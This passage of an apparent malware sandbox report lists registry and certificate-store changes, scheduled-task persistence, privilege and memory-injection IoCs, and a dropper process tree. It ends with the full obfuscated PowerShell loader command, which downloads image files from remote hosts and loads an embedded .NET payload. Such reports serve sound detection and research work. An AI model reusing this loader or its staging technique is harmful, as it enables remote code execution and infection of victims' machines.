iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "447649981" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 4 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd XxzH301.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd XxzH301.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3820 schtasks.exe 4004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 2200 rapes.exe 2944 powershell.exe 1972 powershell.exe 2164 6757fa68cc.exe 988 84a6344dd6.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3260 eb8fc3faf3.exe 3260 eb8fc3faf3.exe 3260 eb8fc3faf3.exe 3260 eb8fc3faf3.exe 4064 powershell.exe 3164 powershell.exe 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3924 yUI6F6C.exe 3924 yUI6F6C.exe 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com 3952 Seat.com -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 1664 taskkill.exe Token: SeDebugPrivilege 1364 taskkill.exe Token: SeDebugPrivilege 2920 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 1788 firefox.exe Token: SeDebugPrivilege 1788 firefox.exe Token: SeDebugPrivilege 3260 eb8fc3faf3.exe Token: SeDebugPrivilege 3488 HHPgDSI.exe Token: SeDebugPrivilege 3688 HHPgDSI.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeDebugPrivilege 3660 tasklist.exe Token: SeDebugPrivilege 3724 tasklist.exe Token: SeDebugPrivilege 2272 tasklist.exe Token: SeDebugPrivilege 3148 tasklist.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1876 iexplore.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3952 Seat.com 3952 Seat.com 3952 Seat.com -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3060 c4e478285d.exe 3764 Occupation.com 3764 Occupation.com 3764 Occupation.com 3952 Seat.com 3952 Seat.com 3952 Seat.com -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1876 iexplore.exe 1876 iexplore.exe 900 IEXPLORE.EXE 900 IEXPLORE.EXE 900 IEXPLORE.EXE 900 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2960 wrote to memory of 2200 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 30 PID 2960 wrote to memory of 2200 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 30 PID 2960 wrote to memory of 2200 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 30 PID 2960 wrote to memory of 2200 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 30 PID 2200 wrote to memory of 584 2200 rapes.exe 33 PID 2200 wrote to memory of 584 2200 rapes.exe 33 PID 2200 wrote to memory of 584 2200 rapes.exe 33 PID 2200 wrote to memory of 584 2200 rapes.exe 33 PID 2200 wrote to memory of 1996 2200 rapes.exe 34 PID 2200 wrote to memory of 1996 2200 rapes.exe 34 PID 2200 wrote to memory of 1996 2200 rapes.exe 34 PID 2200 wrote to memory of 1996 2200 rapes.exe 34 PID 1996 wrote to memory of 1796 1996 m4mrV1B.exe 35 PID 1996 wrote to memory of 1796 1996 m4mrV1B.exe 35 PID 1996 wrote to memory of 1796 1996 m4mrV1B.exe 35 PID 1796 wrote to memory of 1516 1796 cmd.exe 37 PID 1796 wrote to memory of 1516 1796 cmd.exe 37 PID 1796 wrote to memory of 1516 1796 cmd.exe 37 PID 1516 wrote to memory of 2944 1516 WScript.exe 38 PID 1516 wrote to memory of 2944 1516 WScript.exe 38 PID 1516 wrote to memory of 2944 1516 WScript.exe 38 PID 2944 wrote to memory of 1972 2944 powershell.exe 40 PID 2944 wrote to memory of 1972 2944 powershell.exe 40 PID 2944 wrote to memory of 1972 2944 powershell.exe 40 PID 2200 wrote to memory of 2600 2200 rapes.exe 41 PID 2200 wrote to memory of 2600 2200 rapes.exe 41 PID 2200 wrote to memory of 2600 2200 rapes.exe 41 PID 2200 wrote to memory of 2600 2200 rapes.exe 41 PID 2600 wrote to memory of 1876 2600 OSKDbmy.exe 42 PID 2600 wrote to memory of 1876 2600 OSKDbmy.exe 42 PID 2600 wrote to memory of 1876 2600 OSKDbmy.exe 42 PID 1876 wrote to memory of 900 1876 iexplore.exe 43 PID 1876 wrote to memory of 900 1876 iexplore.exe 43 PID 1876 wrote to memory of 900 1876 iexplore.exe 43 PID 1876 wrote to memory of 900 1876 iexplore.exe 43 PID 2200 wrote to memory of 2164 2200 rapes.exe 45 PID 2200 wrote to memory of 2164 2200 rapes.exe 45 PID 2200 wrote to memory of 2164 2200 rapes.exe 45 PID 2200 wrote to memory of 2164 2200 rapes.exe 45 PID 584 wrote to memory of 1604 584 XxzH301.exe 46 PID 584 wrote to memory of 1604 584 XxzH301.exe 46 PID 584 wrote to memory of 1604 584 XxzH301.exe 46 PID 584 wrote to memory of 1604 584 XxzH301.exe 46 PID 2164 wrote to memory of 1608 2164 6757fa68cc.exe 48 PID 2164 wrote to memory of 1608 2164 6757fa68cc.exe 48 PID 2164 wrote to memory of 1608 2164 6757fa68cc.exe 48 PID 2164 wrote to memory of 1608 2164 6757fa68cc.exe 48 PID 584 wrote to memory of 2980 584 XxzH301.exe 50 PID 584 wrote to memory of 2980 584 XxzH301.exe 50 PID 584 wrote to memory of 2980 584 XxzH301.exe 50 PID 2200 wrote to memory of 988 2200 rapes.exe 52 PID 2200 wrote to memory of 988 2200 rapes.exe 52 PID 2200 wrote to memory of 988 2200 rapes.exe 52 PID 2200 wrote to memory of 988 2200 rapes.exe 52 PID 2200 wrote to memory of 3060 2200 rapes.exe 53 PID 2200 wrote to memory of 3060 2200 rapes.exe 53 PID 2200 wrote to memory of 3060 2200 rapes.exe 53 PID 2200 wrote to memory of 3060 2200 rapes.exe 53 PID 3060 wrote to memory of 2496 3060 c4e478285d.exe 54 PID 3060 wrote to memory of 2496 3060 c4e478285d.exe 54 PID 3060 wrote to memory of 2496 3060 c4e478285d.exe 54 PID 3060 wrote to memory of 2496 3060 c4e478285d.exe 54 PID 3060 wrote to memory of 1664 3060 c4e478285d.exe 56 PID 3060 wrote to memory of 1664 3060 c4e478285d.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\mic107A.tmp.exeC:\Users\Admin\AppData\Local\Temp\mic107A.tmp.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Windows\system32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"5⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@G